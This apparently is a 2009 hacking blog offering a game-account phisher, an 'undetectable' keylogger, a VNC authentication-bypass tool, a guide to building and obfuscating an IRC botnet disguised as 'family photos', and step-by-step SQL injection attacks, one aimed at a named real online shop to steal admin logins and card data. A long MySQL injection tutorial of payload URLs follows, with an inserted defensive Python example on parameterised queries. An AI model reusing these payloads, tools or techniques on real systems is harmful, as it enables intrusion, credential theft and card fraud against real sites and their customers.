Wednesday, April 1, 2009

RS PHIS

Here you go. This is a phisher modded with the new phisher warning.
RS PHIS

http://rapidshare.com/files/208908371/RSP_v3_TES_mOD_By_Need4Weed.rar

Avhackers Keylogger 1.0, 99% FUD

Features:
1. Completely Stealth (FUD)
2. Intuitive Interface
3. Application Monitoring
4. Password Recording
5. Messenger Recording
6. Keyboard Recording
7. Stealth Email Recording
8. Hot Keys to hide and unhide the keylogger application

Download Link [Including Video Tutorial]

http://rapidshare.com/files/209957263/Avhackers_Keylogger_1.0_By_Dsuraj_www.Avhackers.com.rar


Thursday, February 5, 2009









Wednesday, February 4, 2009

Hack CC

First, go to google.com and search for this:

inurl:/shopdisplayproducts.asp

OK, now we have found some sites that use shopdisplayproducts.asp.

Let's take one of them:

Code:

http://www.globalasp.org.uk/store/sh…ucts.asp?id=14

OK, now we add this sign ' to the end of the link,

so the link looks like this:

Code:

http://www.globalasp.org.uk/store/shopdisp….asp?id=14

'

and we get this error:

products
microsoft jet database engine error ‘80040e14'

syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname’.

/store/shop$db.asp, line 467

If we see this error, the site is injectable!

OK, now we remove the ' again:

Code:

http://www.globalasp.org.uk/store/sh…ucts.asp?id=14

and add this to the end of it:

%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20tbluser'

The link is now:

Code:

http://www.globalasp.org.uk/store/shopdisp…%20tbluser’

Put it in the browser and we get the same error.

OK, now look at these numbers:

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50

Now we remove ,50

and test again:

Code:

http://www.globalasp.org.uk/store/shopdisp…%20tbluser’

Same error again. Keep removing the last number and testing; when the error disappears and a page shows, you have the right number. On this server the correct number for
the exploit is -> 47 <-

Code:

http://www.globalasp.org.uk/store/shopdisp…%20tbluser’

—> here 47 is the last number

OK, now we put this in the browser, get no error, and see some laptops.

OK, now find the numbers 3 and 4 on that page;
they are small.

When we find those numbers, we replace the 3 and 4 in the link with this:
fldusername,fldpassword

Now the exploitable link is this:

Code:

http://www.globalasp.org.uk/store/shopdisp…%20tbluser’

and where the numbers 3 and 4 were, there are now a username and password for
the shopadmin login. Now we go to this link:

http://www.globalasp.org.uk/store/colours$config.asp

There is the shopadmin login, and we log in!

These are other paths where the shopadmin can be, too:

shopadmin.asp —-> this one, or with a 1
shopadmin1.asp —-> this is the one in 90% of cases
adminindex.html
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp


Code:

http://www.publishamerica.com/shopping/

... 20tbluser'

Code:

http://msponline.net/shopping/shopadmin.asp









Love Is Blind.......

Thursday, January 29, 2009

Java Botnet - Irc

Yes, this is a follow-up on Bm1 (is that his name?).

I will be telling you how to compile and jar your botnet, as well as how to edit it.

First off, what is a botnet? This one connects to IRC so that whoever is in the channel can take control of the user's machine: attack websites using the bots to do the dirty work, download files onto the bots' PCs and add them to startup. I THINK you can add a shell to this one as well.
Code:

Download the source: http://www.megaupload.com/?d=VC72O61M

It is named "family photos" so they won't delete it.

First we are going to edit the file "config.php". Fill in all the fields; you need to know how to use IRC for this. Once edited, upload it and remember the URL so you can find it again.

Next we edit "Constants.java". This can be opened in Notepad and is pretty easy to edit. Don't worry too much about the backup stuff. Remember the "config.php" we uploaded? Make sure you put the right path to it.

Right, easy. Now we need to compile it. Make sure you have the Java JDK.

Code:

http://java.sun.com/javase/downloads/index.jsp

First one there.

Now go into your botnet folder and click "Compile A.bat". If you are unsure what this .bat does, right-click it and click Edit to see its source.

You should now see lots of .class files. If so, good: your botnet compiled. Now click "Compile.bat". This makes a jar called "jusched.jar". That's your botnet.

To test that it worked, click the jar (there are two; I'll explain the other one later). It should join the IRC channel you told it to. If you kept the nick settings it will look like [BOT] 84073857340, for example.

Not working? Go through it again. To remove the botnet, go to Start > Run > msconfig > Startup, untick jusched.jar and click Apply. That stops the botnet running. In IRC, double-click the bot to open a private chat with it and send the command ".exit". Then you have removed yourself from the botnet.

The jar you make is unencrypted, so people could read its details. For this I have added "jshrink.jar": drag the botnet jar onto its window, then in the Options tab click "Encrypt Strings". I have attached the license code in a file called jshrink, or here it is:

Code:

31-12-2099 CANCQJUQKEOQKKLI

Now you have a fully working, fully undetected botnet. Enjoy.

Whoever made the source gets full credit for it.

Vnc Auth Bypass tool

The title pretty much explains it.

Download:
http://www.megaupload.com/?d=2J62U8VI

Wednesday, January 28, 2009

MySQL Injection Ultimate Tutorial


SQL Injection is one of the most common web application flaws today. It is also one of the deadliest, because it lets remote users read confidential information such as usernames and credit card numbers. With databases at the core of the economy and so much wealth held on servers that clever attackers may be able to compromise, SQL Injection is a problem that needs to be addressed, not so that hackers can exploit these errors for their own gain, pleasure or challenge, but to raise awareness that a simple mistake by a lazy or inexperienced programmer can have consequences ranging from a website defacement to the leaking of millions of users' financial information. To start this paper off, here is an outline of MySQL Injection attacks, which also serves as a table of contents, since each section covers a separate step of the exploitation process.

MySQL Injection Outline (table of contents):

In Part 1 (this part):

Section 1 - Intro to Basic Database Information

Section 2 – Steps to injections

1)Find out how to close the previous statement & find the right comment to use to end the injection

2)Check for magic quotes

3)Check to see if UNION works

4)Find the number of columns

5)Craft a union statement that doesnt cause an error and see which columns are outputted

6)Check the mysql version to see if information_schema is present

7)Get the desired column and table names

8)Get your data



In Part 2: (not done yet)

Section 1 – Advanced injections

1)Check for load_file()

2)Check for into outfile

3)Ddos the mysql server

4)login page injections

5)Possible failures - multi selects

6)Get past magic quotes - where, concat - no load_file

7)The no spaces bug

8)Getting past filters

9)Blind Injection

10)Advanced NOT IN



Before we start inserting SQL commands and pulling data out of columns and tables, we need to cover the basics and all the terms needed to fully understand this paper. So let's begin with some basic database server info. By the end of this section you should understand the basics of databases and how they work at the level a user interacts with them.

Section 1: Basic Database Information

Database (DB) servers are servers that hold information. The information is kept in databases: each database is a structured container on the server that stores data in organized subsections, which allows quick and efficient retrieval and insertion of data.

A DB server can have many databases, each with a different use: a web database may hold content displayed on (or needed to render) public web pages, an intranet database may hold information needed by employees on the company's internal network, and so on. There are many types of database servers, but they are all similar, with a few differences. Some common ones are:

1)Mysql

2)MsSQL (Microsoft SQL Server)

3)Oracle

4)Microsoft Access

5)PostgreSQL

etc..

In this tutorial we will discuss one of the two most common, MySQL (the other is MsSQL, followed by Microsoft Access).

DBs are made up of tables, each of which holds one kind of data, such as user info or articles. Tables are made up of columns, which split the data into fields such as username, password, date registered, etc. The actual data in a table is stored in rows, which are inserted into the table and hold a value for each column - e.g. a username, a password, etc.



The original post had a diagram of this layout (server > databases > tables > columns > rows) here.



Now, to get data out of the server you use SQL, Structured Query Language. It is similar to a programming language in that it has its own functions, operators and syntax. It lets you pick the database, table and columns you want and select the rows you need from them.

SQL has a set format for selecting data from the database. It looks like this:

SELECT column1,column2 FROM table

This says: go to table "table" and get the data stored in columns "column1" and "column2" for all its rows (no row count is specified, so it returns them all; I'll show you how to limit that next).

But what if you only wanted two rows? You could still fetch every row and sort it out in PHP, but that's inefficient. Say you wanted the FIRST two usernames and passwords from table users of database webinfo (for injections you usually don't have to name the database; the code has already selected it). You would use:

Select column_name FROM table_name limit start,number

column_name is the columns you want. if you want two columns, you would do column1,column2.

table_name is the table. To use a table from a different database on the same server, write database.table.

limit start,number tells the server which rows you want. For the first two rows, make start 0 (rows are counted from 0) and number 2: skip no rows and return the next two.

For the next two rows after the first two (only two, not all four), make start 2, since you already have two, and number 2 again (limit 2,2). This skips the first two rows and returns the next two, i.e. the third and fourth. For all four, use start 0 and number 4.

For injections you don't need to know how the script pulls the data out of the query result in PHP/ASP (usually by walking the arrays the MySQL query returns), since that is already done for you by the script you are attacking. You just need to find out which columns get displayed on the page, which we will discuss later.

Now, say you want the password of the user whose username is "bako123". This is what login systems do to check logins. You would use:

Select column_name FROM table_name WHERE column_name = 'Value'

For example, to get the password column from the table users in the row where the username column is bako123, you would do:

Select password FROM users WHERE username = 'bako123'

This returns the password of one particular user, bako123. The same pattern is used to retrieve a certain article, one user's info, one person's financial information, etc.

If you wanted the password of a user whose name merely contains bako, maybe xbako or bakos or xbakos, you would do:

Select password FROM users WHERE username LIKE '%bako%'

The % is a wildcard that matches any text in its place, so here there can be text both before and after bako, since there is a % on each side.

This leads us to the final discussion in this section: Magic Quotes.

Many scripts escape the quotes in incoming data, either through PHP's magic_quotes_gpc setting or with an escaping routine of their own; both are usually just called "magic quotes". Quotes like ' are needed to mark strings, both in statements like WHERE username = '...' and in the functions we discuss later that load files by name. For example, in WHERE username LIKE '%bako%' the quotes tell the server that the string to search for is %bako%. Without them the server would not treat %bako% as a string: the search would fail and the query would return an error because %bako% is out of place.

Magic quotes stop quotes from being used in injections by turning each ' (the original quote) into either \' (a backslashed quote) or '' (a doubled quote).



The \' tells the SQL server to ignore the special meaning of the ' and treat it as an ordinary character in the string. For example, say you wanted the password of a user whose username is bako's. If you did:

Select password FROM users WHERE username = 'bako's'

the ' in bako's would end the username = value comparison, making it WHERE username = 'bako'. The s' left over would then be stray and cause an error.

So to specify that the ' is not part of the SQL syntax but just an ordinary character in a string, like the letter b, you put a \ in front of it, which takes its meaning away and makes the server treat it as a normal character.

The other way to take the meaning away from ' is to double it to ''. Say you wanted to look up the user bako's again and put bako's straight into the script, like

Select password FROM users WHERE username = 'bako's'

the script/server would change it to

Select password FROM users WHERE username = 'bako''s'

In SQL a doubled quote inside a string literal stands for one literal quote, so 'bako''s' is read as the single string bako's and the query runs without error; the injected quote never gets a chance to end the string. There is a way around this escaping in certain cases, which will be discussed later. Now that you know the basics of MySQL, time to start injecting!!
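As an added example that is not part of the original tutorial, here is the quoting behaviour described above in runnable form. It uses Python's built-in sqlite3 module in place of MySQL (SQLite only understands the doubled-quote '' escape, not the backslash form) with a constructed users table, and compares a concatenated query, a query with doubled quotes, and a parameterised query against both the legitimate username bako's and an injected value. The last function shows a caveat the tutorial does not spell out: escaping quotes does nothing when the value is dropped into the query without quotes around it.

```python
import sqlite3

# Constructed sample data standing in for the tutorial's "users" table.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'bako123', 'pw1'),
                             (2, 'bako''s', 'pw2'),
                             (3, 'admin',   'pw3');
""")


def _run(sql, params=()):
    """Run a query and return the password column of every matching row,
    or None when the database rejects the statement (a syntax error)."""
    try:
        return [row[0] for row in _db.execute(sql, params)]
    except sqlite3.Error:
        return None


def escape_sql_string(value):
    """Neutralise quotes by doubling them, the '' form described above.
    MySQL additionally accepts the backslashed form magic_quotes_gpc produced;
    SQLite does not, so this example sticks to doubling."""
    return value.replace("'", "''")


def passwords_unsafe(username):
    """String concatenation, the injectable pattern: a quote in the value
    ends the string early and whatever follows is parsed as SQL."""
    return _run("SELECT password FROM users WHERE username = '%s'" % username)


def passwords_escaped(username):
    """Same query, but the quotes in the value are doubled first."""
    return _run("SELECT password FROM users WHERE username = '%s'"
                % escape_sql_string(username))


def passwords_param(username):
    """Parameterised query: the value is bound separately and never becomes
    part of the SQL text, so no escaping is needed at all."""
    return _run("SELECT password FROM users WHERE username = ?", (username,))


def password_by_id_escaped(user_id):
    """Escaping only protects values that sit inside quotes. Here the id is
    interpolated bare, so doubling quotes changes nothing: '1 OR 1=1'
    contains no quote to escape and still returns every row."""
    return _run("SELECT password FROM users WHERE id = %s"
                % escape_sql_string(user_id))


if __name__ == "__main__":
    print(passwords_unsafe("bako's"))           # None: syntax error
    print(passwords_unsafe("' OR '1'='1"))      # ['pw1', 'pw2', 'pw3']
    print(passwords_escaped("bako's"))          # ['pw2']
    print(passwords_escaped("' OR '1'='1"))     # []
    print(passwords_param("bako's"))            # ['pw2']
    print(password_by_id_escaped("1 OR 1=1"))   # ['pw1', 'pw2', 'pw3']
```

The parameterised form is the one to use in real code; the escaped form is only there to show what magic quotes buy you (a quoted string context) and what they do not (an unquoted integer context).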

Section 2: SQL Injecting to Steal Data

In this section we will cover each of the steps to successfully exploiting SQL Injection vulnerabilities in web scripts that use MySQL. We will go step by step and cover each part thoroughly. By the time you finish this section you should fully understand how to take advantage of SQL Injection vulnerabilities and be able to retrieve data such as usernames, passwords, financial information and other confidential data from the databases behind vulnerable scripts. We'll start from the very beginning: determining whether the script is vulnerable at all.

Subsection 2.1: Check for Injections

So say you find a script like this and want to see if it's vulnerable to SQL Injection:

http://site.com/script.php?id=1

To show how this works, let's say you know the query the script builds (which is usually not the case in real-world injections). Say it looks like this:

Select title,data FROM news WHERE id = 1

This gets the title and data from the news table in the row where the column id is 1; the 1 is taken straight from the URL.

So what if we added some SQL to the id in the URL? Like this:

http://site.com/script.php?id=1'

The output depends on the quality of the script. If it filters the input for SQL keywords, casts the id to an integer so nothing else gets through, or takes any other precaution so that you can't insert SQL into the query, then no SQL error comes back: the page either loads normally or shows a warning like "Attack spotted, your IP address has been recorded". If, however, the script has no filtering at all and just takes the id from the URL and drops it straight into the MySQL query, you get an error like this:

"MySQL Syntax Error By '1'' In file script.php On Line 7."

Then you know the script does NOT filter SQL syntax out of the input and does NOT make sure the value is an integer. Since you got an error, you can be SURE it is SQL injectable!

Keep in mind that not all sites have errors this verbose; some just say "INTERNAL ERROR" or "ERROR" and reveal nothing useful. You can still be reasonably sure it's injectable. To be fully sure, move on to the next step; if every possibility there fails, chances are it wasn't an SQL error but some other kind.

Now that you've found out it's injectable, let's go step by step through my MySQL Injection outline.



Subsection 2.2 - Step 1)Find out how to close the previous statement.

To do this we use the SQL operator AND. It lets you specify two criteria that a row must match. For example, if you have a WHERE clause such as

Select user from users where password = 'pass123'

and want to select data not only where the password is 'pass123' but also where the email is 'email@m.com', you would use something like this:

Select user from users where password = 'pass123' AND email = 'email@m.com'

This tells the server: select the user column from the rows of table users where the password is pass123 AND the email is email@m.com. If a row doesn't match both criteria, it is skipped and the server moves on to the next row.

Another operator like AND is OR. An example:

Select user from users where password = ‘pass123’ OR email = ‘email@m.com’

This says: rather than requiring both, match rows where the password is pass123 OR the email is email@m.com. Only one of them needs to hold for the row to be chosen, even if the other doesn't.

Now, if you add and 1=1 to any WHERE clause, the query still works, since 1 always equals 1 (and since 1=2 is always false, adding and 1=2 should make the row disappear, which is a handy counter-check). This is very useful from an attacker's point of view: it helps us find out how to close the existing query AND lets us tell whether magic quotes are enabled.

Lets say you dont know the query, as you wont in most cases. The query could be anything like:

Select user from users where id = '1'

or

Select user from users where id = (1)

or

Select user from users where id = 1

etc...

To add more SQL and steal our data (credit cards, usernames, passwords, etc.) we need to be able to close the where id = 1 (or '1', (1), etc.). To do that we try the different possibilities until we get NO error.

To add our commands we also need to get rid of whatever comes after our injection in the original query. For example, if the query was:

Select user from users where id = '1'

and we requested http://site.com/script.php?id=1' and 1=1 (with magic quotes OFF)

the query would become

Select user from users where id = '1' and 1=1 '

The stray ' after 1=1, left over from the '1' we broke out of, has to be dealt with or it will cause an error. To do that we use a comment to comment out the rest of the query. Two comment markers are /* and --. Sometimes one causes an error; then try the other. One caveat: MySQL only treats -- as a comment when a space follows it, and a trailing space is easily lost from a URL, so end the injection with something like "-- -" or encode the space as %20. MySQL also accepts # as a line comment marker.

So lets have an full example for this first step in injections.

Say the script was, as before:

http://site.com/script.php?id=1

First we check if it's injectable:

http://site.com/script.php?id=1'

It gives - "Error in MySQL Syntax by '1'' in script.php on line 7."

Now you know it's injectable. Let's try to find out how to close the WHERE clause.

http://site.com/script.php?id=1 or 1=1 --

This would work if the 1 was not surrounded by quotes, as in

SELECT title FROM news where id = 1

This gives the error - "Error in MySQL Syntax by '1' or 1=1 --' in script.php on line 7."

Remember, MySQL surrounds the part of the query it choked on, here 1' or 1=1 --, with quotes, so don't let the quotes at the start and end confuse you.

Even though the error shows a ' right after the 1 (by '1' or 1=1 --'), we'll pretend we didn't notice (not all sites give errors like this anyway).

So next we try

http://site.com/script.php?id=1 or 1=1 /*

same error - "Error in MySQL Syntax by '1' or 1=1 /*' in script.php on line 7."

Now let's try closing it with '. So:

http://site.com/script.php?id=1' or 1=1 /*

now we get the error - "Error in MySQL Syntax by '/*'. in script.php on line 7."

This tells us that either /* isn't accepted here or this server insists on a closing */, which would defeat the point of commenting out the rest (many MySQL versions reject an unterminated /* comment). But since it no longer complains about the ' after id=1, we know we're close. So we try the other comment marker:

http://site.com/script.php?id=1' or 1=1 --

The page loads normally!!! Now we know we need to close the WHERE clause with ' and add -- at the end to append our own SQL!!

Now we move on to the next step:





Subsection 2.3 - Step 2)Check for magic quotes

We know from the example above that magic quotes are off, because we used ' to close the WHERE clause and got no error. But let's pretend our first try had worked, http://site.com/script.php?id=1 or 1=1 --, so we don't yet know whether ' causes an error. We need to know whether magic quotes are on because if we want to use a function like load_file to steal files (discussed later), or pick data where user = 'admin', we need to be able to use quotes, so magic quotes MUST be off.

To find out whether they're on, we try:

http://site.com/script.php?id=1 or '1'='1' --

If you get an error like:

"Error in MySQL Syntax by '\'1\'=\'1\''. in script.php on line 7."

or

"Error in MySQL Syntax by '''1''=''1'''. in script.php on line 7."

then you know magic quotes are on, since a \ or an extra ' is being added to every ' you send. Then you can't pick data with WHERE in the normal way (there is a way around it, discussed later, using functions like concat). One caveat the original glosses over: MySQL accepts strings written as hex literals (0x61646d696e is 'admin') or built with char(), which contain no quotes at all, and those work inside load_file() as well.

If you get no error, magic quotes are off and you have an even bigger advantage. That was easy, wasn't it? Now let's move on.



Subsection 2.4 - Step 3)Check to see if UNION works

UNION is an SQL operator that lets us tack a second SELECT onto a statement and get its rows back in the same result. This is very useful, since we need it to select the data we want to steal, such as passwords or financial data. To illustrate, say the query was:

SELECT user from users where pass = 'pass'

we could do

SELECT user from users where pass = 'pass' UNION select email from emails limit 0,1

and no error would be displayed. You don't need to know how the script gets the data onto the page, since that isn't needed to get the injection working.

However, to get the data from the UNION SELECT displayed, we need to make sure the first SELECT returns no rows at all. The rows of both SELECTs come back together, and most scripts display only the first row, so if the original SELECT matches anything its row is shown instead of ours; requesting an id that doesn't exist (id=-1) or adding and 1=0 takes care of that. We will come back to this later. Also, use UNION ALL rather than plain UNION: plain UNION makes the server strip duplicate rows first, which is slower and can hide rows. (MySQL coerces column types across a UNION, so type mismatch errors are less of a problem than on other servers.)

Now, UNION was only added in MySQL 4.0, so it isn't available on 3.23 servers (4 and 5 have it, and 5 is the most common). To steal our data we need UNION (well, we could use blind injection, but that's a pain), and for UNION the MySQL version MUST be 4 or later.

There is a way to check the MySQL version without UNION (1 and substr(@@version,1,1)>3), but that's more advanced than the tone of this tutorial at the moment (I'll go over it in a bit), so we'll use an easier way: try a UNION SELECT and judge the error. So we could try:

http://site.com/script.php?id=1' UNION ALL SELECT 1 --

If you get an error like :

"Error in MySQL Syntax by 'UNION'. in script.php on line 7."

then you know the server doesn't understand UNION, since it chokes on the UNION keyword itself. If you got an error like:

"MySQL Error: Select statements must have the same number of columns in script.php on line 7."

then you know UNION worked, since the server noticed that the two selects don't have the same number of columns, which shows it parsed both the original SELECT and our UNION. Even if you got a different error, such as a type conversion one, as long as it isn't complaining about UNION itself it's fine. For sites whose errors just say "INTERNAL ERROR" or similar, it's a good idea to try the next method.

So, if there are no error messages like these, just "INTERNAL ERROR", you can use

http://site.com/script.php?id=1' and substr(@@version,1,1)>3 --

substr takes part of a string, and @@version gives us the MySQL version as a string. So if @@version returned 4.1.33-log, substr(@@version,1,1) takes one character starting at the first, which is 4 (the original substr(@@version,1) returns the whole string from the first character on; MySQL converts '4.1.33-log' to the number 4.1 when comparing it with 3, so it happens to work anyway). Then it checks whether that is greater than 3 (the >3 part). If it is, the page loads normally. If not, the page loads with no data (a blank page, or the basic template with no content, e.g. no news title and no news).

Now if UNION works, we're in business! Time to move on! If not, you can use blind injection, which will be briefly discussed later in Part 2.





Subsection 2.5 - Step 4)Find the number of columns

This section fixes the error we got before - "MySQL Error: Select statements must have the same number of columns in script.php on line 7.". To actually use UNION to steal data, we must first get UNION to work with no error at all, so the page loads and displays the stolen data.

The error occurred because the original SELECT and the UNION ALL SELECT we injected had different numbers of columns. With UNION SELECT (or UNION ALL SELECT), the number of columns must ALWAYS match the number in the first SELECT, or you get an error. For example, if the query looked like this:

Select user,pass FROM users WHERE userid = 1 UNION ALL SELECT email FROM emails

you get that error, since the first select picks two columns (user and pass) while the UNION ALL SELECT picks only one (email). So if you did

Select user,pass FROM users WHERE userid = 1 UNION ALL SELECT email,id FROM emails

there would be no error and the query would run successfully, since the first SELECT picks two columns (user and pass) and the second, the UNION ALL SELECT, also picks two (email and id).

Now, to get the number of columns in the first SELECT, we can do one of two things:

1) guess the number of columns until you get it right. For example

http://site.com/script.php?id=1' UNION ALL SELECT null --

(null is the SQL value that means "no data". If you used 1 or 'the', i.e. an integer or a string, you might get a type mismatch error.)

If you get an error like "MySQL Error: Select statements must have the same number of columns in script.php on line 7." then you move on to

http://site.com/script.php?id=1' UNION ALL SELECT null,null --

and keep adding ,null (one more column) to the URL until you get no error. Then count the nulls, and that's the number of columns!

2) use ORDER BY - this is WAY easier.

ORDER BY is a clause that tells the database server how to sort the result. For example, if you did

SELECT title,data FROM news WHERE id=1 ORDER BY title ASC



the server would sort all the output alphabetically from a to z by title. Changing ASC to DESC makes it z to a.

The server looks at the column's type: strings are sorted alphabetically, integers numerically.

ORDER BY also accepts a number instead of a column name. The number is the position of the column in the SELECT list. For example, if the query was this:

SELECT title,data FROM news WHERE id=1 ORDER BY 1 ASC

It would sort by the first column in the query, which is title (it selects title, data), alphabetically from a to z.

If it was

SELECT title,data FROM news WHERE id=1 ORDER BY 2 ASC

It would use the second column selected, data, and sort by that.

So we can take advantage of this and try numbers from 1 upward in the URL. Once we hit an error saying the column is unknown, we know the last number that did NOT give an error is the number of columns. Here's an example:

http://site.com/script.php?id=1' ORDER BY 1 -- no error

http://site.com/script.php?id=1' ORDER BY 2 -- no error

http://site.com/script.php?id=1' ORDER BY 3 -- no error

http://site.com/script.php?id=1' ORDER BY 4 -- error - "MySQL Error: Unknown column '4' in 'order clause' in script.php on line 7."

So we know that 3, the last number that gave no error, is the number of columns in the first SELECT!

Now let's move on to the next step!



Subsection 2.6 - 5)Craft a union statement that doesn't cause an error & see which columns are output

Now that we know the number of columns, we need to build a UNION statement and see which columns get output to the page, so we know which ones we can use to show our data on screen. This is generally a two-step process.

1) First we build the UNION SELECT (remember to use UNION ALL) with numbers as the columns. An example:



http://site.com/script.php?id=1' UNION ALL SELECT 1,2,3 --

If there is no error, look at the page and check which numbers show up where data normally appears (for example, where the article title would be, check whether a number is there).

If numbers appear on the page, you know you can use the columns with those numbers to display stolen data. The columns that aren't displayed are useless to us.

For example, if you see the number 2 in the page title and a 3 where the article is usually displayed, you know you can use the second and third columns (where you put the 2 and 3 in the union all select 1,2,3 --) to show the data you steal from the database.

Now, if you get an error when you use all numbers, like "MySQL Error: Cant convert int in script.php on line 7.", then one column can't take a number, so move on to step 2. (MySQL itself is lenient about mixing types across a UNION; an error like this usually comes from the script's own handling of the values.)

2) Since we can't go all out and use integers everywhere, we use null. null never causes a type conversion error, since it is just an empty placeholder. So we try:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --

If you STILL get an error, there is a good chance the script runs TWO select statements. For example, first it might do

SELECT title,data,author FROM news WHERE id= '[your data from the url]'

and then, further down, use the id value from the URL again in another select like this:

SELECT date,time FROM news WHERE id= '[your data from the url]'

Now the first select statement becomes:

SELECT title,data,author FROM news WHERE id= '1' UNION ALL SELECT null,null,null --

but the second will be

SELECT date,time FROM news WHERE id = '1' UNION ALL SELECT null,null,null --

This would cause an error since the second query has ONLY TWO columns in its select statement (date,time), while the UNION ALL SELECT has THREE columns. This causes another error saying the select statements need the same number of columns. Now if you change the UNION ALL SELECT to have two NULLs, then the first select would cause an error instead.



Unfortunately, there is no way around this in MySQL at the moment (in MSSQL there is, however). A good way to double check that it's a multi select and not that you messed up the number of columns in the UNION select statement is to cause an error like we did before, doing

http://site.com/script.php?id=1'

Say you got an error like this:

"MySQL Syntax Error By '1'' In file script.php On Line 7."

Then do the union all select url like this:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --

say you get an error like this:

"MySQL Error: Select statements must have the same number of columns in script.php on line 18."

Now look at the two errors. The first is on line 7, and the second on line 18. Since two separate lines of code caused the errors, you know that two separate queries caused them, and it is in fact a multi select, which you can't get around.

Keep in mind that not all sites have errors that verbose. Some just say "error". Then you would have to double check the columns and make sure you didn't make a mistake.

So let's say there is no multi select. We left off at:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --

Now there is no error. So we try this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,null,null --

We check for two things: an error, and if no error is displayed, whether the number 1 is displayed on the page in a place it wasn't before, like the title or where the news or author would be.

Say you get the same error as before in step 1:

"MySQL Error: Cant convert int in script.php on line 7."

Then you know that the first column causes an error, and you should ignore it and switch it back to NULL.

If it happens that all the columns cause errors or aren't displayed on the page, you can come back and test them with 'test' instead of 1 and see if it displays the text or still gives a conversion error. If you get no error AND the word test is displayed on the page, you can go further and get usernames/passwords and any other text-based data, but not data that are integers like dates and credit cards.



So now that we know 1 causes an error, we switch it back to NULL and move on to check column two.

http://site.com/script.php?id=1' UNION ALL SELECT null,2,null --

Now look at the screen. Let's say there is an error. So now we know that 2 also causes an error and can't be used.

So let's change 2 back to NULL and try 3.

http://site.com/script.php?id=1' UNION ALL SELECT null,null,3 --

and guess what - no error! Now check the page for the number 3. Check places such as the title bar in your browser and the places where data was, like where the news, the author or the date was. If you don't find anything, don't give up: make the number unique like 1232323132, view the source and see if it's displayed in any hidden tags.

If it's not displayed, as I said before, you can go back to the other two and try strings like 'test' (as long as magic quotes are disabled, or you're getting around them, as I will explain later), and check if those are displayed.

So now we are left with:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,3 --

and we know we can use the 3rd column to display our stolen data! So let's move on to step 6:



Subsection 2.7 - Step 6) Check the MySQL version to see if information_schema is present

This is an easy step!

Information_schema is a part of the database that holds ALL of the table names and column names stored in that database. You can access it like any other table.

To get tables, you would use information_schema.tables like this:

select table_name from information_schema.tables

This would return all of the tables that exist in the database.

To get columns you would use information_schema.columns

select column_name from information_schema.columns

This would return all the column names in all the tables of the database.

Information_schema.columns also holds the table names, so you can switch column_name with table_name and use it to get tables too.

Now this luxury is only available in MySQL version 5 and up (6). So to make sure we can use it, we need to use @@version to check the version. So let's take our URL and replace the 3 with @@version.

http://site.com/script.php?id=1' UNION ALL SELECT null,null,@@version --

Now, check where the 3 was before to see the version.

If the version is like 4.0.22-log, then the MySQL version is 4 and you can't use information_schema.tables, but if it's 5.0.1, then you can use information_schema.tables! You can also use the substring method I described before.

Now let's move on to step 7:

Subsection 2.8 - Step 7) Retrieve the desired columns

If the version is above or equal to 5, we can scan information_schema for password (or credit card, etc) columns. If not, we have to guess and use clues given to us in errors to find the prefixes, tables and columns that we want to steal data from. So for the first part let's assume that information_schema is available.

Now we need to scan information_schema for columns that are similar to pass, password, user_pass, etc. (you can change it around so it will be creditcard, address, phone number, etc)

So, we need to use information_schema.columns and the LIKE operator along with wildcards (%), as I discussed in the basic info section.

So if we were putting queries straight into the db server, it would look like this:

SELECT column_name FROM information_schema.columns WHERE column_name LIKE '%pass%'

(of course, magic quotes will have to be off. If they're on, you will learn how to get past them later on)

For our vulnerable site, it would look like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' --

The LIKE '%pass%' tells the server to make sure column_name has a value that contains "pass" and can have text before and after it (the wildcards). So it could be pass, userpass, password, etc.

This will return the first column_name that is like pass, with text before and after it (from the wildcards before and after it).

Now say you want the table_name the column is in so you can access it with UNION. You would simply change column_name to table_name like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.columns WHERE column_name LIKE '%pass%' --

Now say you don't like this first column/table, and you want to see if there's a second. There are two ways we can do this. The first is with LIMIT (which I explained in the basic info section). So you would add limit 0,1 at the end, which says get 1 result starting from the 0th (first for humans, 0 for computers) result.

Then after you get the column/table, to move on you would do limit 1,1, then limit 2,1, etc. until it runs out of columns. Here's an example:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' limit 0,1 --

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.columns WHERE column_name LIKE '%pass%' limit 0,1 --

then record the column and the table it's in. Let's say the column is userpass and the table members. Then we'd change it to:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' limit 1,1 --

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.columns WHERE column_name LIKE '%pass%' limit 1,1 --

then record the info again. Then we change it to:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' limit 2,1 --

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.columns WHERE column_name LIKE '%pass%' limit 2,1 --

etc, until you run out of columns that are like pass.

Now say you didn't want to use LIMIT. You could also use NOT IN(). For example, say you did

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' --

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.columns WHERE column_name LIKE '%pass%' --



